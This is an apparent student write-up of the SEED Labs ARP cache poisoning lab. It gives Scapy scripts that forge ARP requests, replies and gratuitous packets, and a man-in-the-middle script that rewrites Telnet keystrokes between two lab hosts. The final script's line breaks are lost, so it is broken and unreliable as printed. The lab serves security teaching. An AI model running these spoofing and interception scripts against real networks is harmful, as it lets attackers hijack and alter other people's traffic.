【Seedlabs】ARP Cache Poisoning Attack Lab

一、实验环境

二、实验内容

Task 1: ARP Cache Poisoning

Task 2: MITM Attack on Telnet using ARP Cache Poisoning

一、实验环境

本地共有三台虚拟机，位于同一个子网下。地址如下：

主机名	IP 地址	MAC 地址
M (攻击者)	10.9.0.105	02:42:0a:09:00:69
A (客户端)	10.9.0.5	02:42:0a:09:00:05
B (服务器)	10.9.0.6	02:42:0a:09:00:06

二、实验内容

Task 1: ARP Cache Poisoning

• Task 1A (using ARP request).

On host M, construct an ARP request packet and send to host A. Check whether M’s MAC address is mapped to B’s IP address in A’s ARP cache.

在主机 M 上，构造一个 ARP 请求包，发送给主机 A。查看主机 A 的 ARP 缓存中 M 的 MAC 地址是否映射到 B 的 IP 地址。

#!/usr/bin/python3
from scapy.all import *
# M
src_mac='02:42:0a:09:00:69'# M
dst_mac='00:00:00:00:00:00'
dst_mac_eth='ff:ff:ff:ff:ff:ff'
src_ip='10.9.0.6' # B
dst_ip='10.9.0.99' # 任意 IP
eth = Ether(src=src_mac,dst=dst_mac_eth)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=1)
pkt = eth / arp
sendp(pkt)

捕获的数据包信息

在主机A上查看arp表，可以看出主机B对应的MAC地址为主机M的MAC地址，攻击成功。

• Task 1B (using ARP reply).

On host M, construct an ARP reply packet and send to host A. Check whether M’s MAC address is mapped to B’s IP address in A’s ARP cache.

在主机 M 上，构造一个 ARP 应答包，发送给主机 A。在 A 的 ARP 缓存中检查 M 的 MAC 地址是否映射到 B 的 IP 地址。

#!/usr/bin/python3
from scapy.all import *
src_mac='02:42:0a:09:00:69' # M
dst_mac='02:42:0a:09:00:05' # A
src_ip='10.9.0.6' # B
dst_ip='10.9.0.5' # A
eth = Ether(src=src_mac, dst=dst_mac)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)
pkt = eth / arp
sendp(pkt)

抓包结果

• Task 1C (using ARP gratuitous message).

On host M, construct an ARP gratuitous packets. ARP gratuitous packet is a special ARP request packet. It is used when a host machine needs to update outdated information on all the other machine’s ARP cache.

在主机 M 上，构造一个 ARP 免费包。 ARP 免费包是一种特殊的 ARP 请求包。当主机需要更新所有其他机器的 ARP 缓存上的过时信息时使用它。

#!/usr/bin/python3
from scapy.all import *
src_mac='02:42:0a:09:00:69' # M
dst_mac='ff:ff:ff:ff:ff:ff' # broadcast MAC address
src_ip='10.9.0.6' # B
dst_ip='10.9.0.6' # B
eth = Ether(src=src_mac, dst=dst_mac)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)
pkt = eth / arp
sendp(pkt)

抓包结果

Task 2: MITM Attack on Telnet using ARP Cache Poisoning

Step 1 (Launch the ARP cache poisoning attack).

First, Host M conducts an ARP cache poisoning attack on both A and B, such that in A’s ARP cache, B’s IP address maps to M’s MAC address, and in B’s ARP cache, A’s IP address also maps to M’s MAC address. After this step, packets sent between A and B will all be sent to M. We will use the ARP cache poisoning attack from Task 1 to achieve this goal.

使用任务1中的ARP缓存中毒攻击来实现这个目标。

其中用于攻击主机B的ARP缓存中毒攻击代码为：

#!/usr/bin/python3
from scapy.all import *
# M
src_mac='02:42:0a:09:00:69'
dst_mac='00:00:00:00:00:00'
dst_mac_eth='ff:ff:ff:ff:ff:ff'
src_ip='10.9.0.5' # A
dst_ip='10.9.0.6' # B
eth = Ether(src=src_mac,dst=dst_mac_eth)
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=1)
pkt = eth / arp
sendp(pkt)

攻击后，查看AB两台主机的ARP表，可以看出对两台主机的ARP攻击成功。

Step 2 (Testing).

After the attack is successful, please try to ping each other between Hosts A and B, and report your observation. Please show Wireshark results in your report.

攻击成功后，在Host A和B之间互相ping。

Wireshark抓包结果如下

Step 3 (Turn on IP forwarding).

Now we turn on the IP forwarding on Host M, so it will forward the packets between A and B. Please run the following command and repeat Step 2.

打开主机M上的数据转发

重新在主机AB之间互ping，结果如下：

Wireshark抓包结果如下：

在icmp请求数据包中，链路层目的地址为主机M的MAC地址，源地址为主机A的MAC地址。IP层目的地址却是主机B的IP地址。

转发开始起作用。主机M收到包后修改链路层的MAC地址，目的MAC为主机B的MAC地址，源MAC为自己的MAC地址。所以IP层是源地址为主机A，目的地址为主机B不变，但是链路层变成由主机M发往主机B。

Step 4 (Launch the MITM attack).

We are ready to make changes to the Telnet data between A and B. Assume that A is the Telnet client and B is the Telnet server. After A has connected to the Telnet server on B, for every key stroke typed in A’s Telnet window, a TCP packet is generated and sent to B. We would like to intercept the TCP packet, and replace each typed character with a fixed character (say Z). This way, it does not matter what the user types on A, Telnet will always display Z.

①首先打开主机M上的数据转发功能，然后在机器A上telnet机器B，输入用户名密码，可以连上，可以正常输入命令并返回结果。

②建立连接后，使用以下命令关闭IP转发。

sysctl net.ipv4.ip_forward=0

在 A 的 Telnet 窗口中输入一些内容，发现无法输入以及回车。

③建立连接后在机器M上关闭包转发，运行ARP缓存中毒攻击和发包程序。

使用的攻击代码如下：

#!/usr/bin/python3
from scapy.all import *VM_A_IP = "10.9.0.5"
VM_B_IP = "10.9.0.6"
def spoof_pkt(pkt):if pkt[IP].src == VM_A_IP and pkt[IP].dst == VM_B_IP and pkt[TCP].payload:# Create a new packet based on the captured one.# (1) We need to delete the checksum fields in the IP and TCP headers,# because our modification will make them invalid.# Scapy will recalculate them for us if these fields are missing.# (2) We also delete the original TCP payload.newpkt = pkt[IP]del(newpkt.chksum)del(newpkt[TCP].chksum)del(newpkt[TCP].payload)###################################################################### Construct the new payload based on the old payload.# Students need to implement this part.#olddata = pkt[TCP].payload.load # Get the original payload datanewdata = str.encode('Z') # No change is made in this sample code#newdata = "Z" * len(olddata)###################################################################### Attach the new data and set the packet outsend(newpkt/newdata)elif pkt[IP].src == VM_B_IP and pkt[IP].dst == VM_A_IP:send(pkt[IP]) # Forward the original packet
pkt = sniff(filter="ether src host not 02:42:0a:09:00:69 and tcp",prn=spoof_pkt)

运行截图

④结果如下，无论输入什么，都会显示z，即使回车，这会使得无法执行命令。

但是在实验中发现，输入的命令可以显示为原先设定的Z，但是输入一串字符，往往只能有最开始的几个字母显示为Z。并且很快就可以恢复输入，猜测是不是由于对两台主机的攻击时效短，攻击失效ARP表及时更新导致的。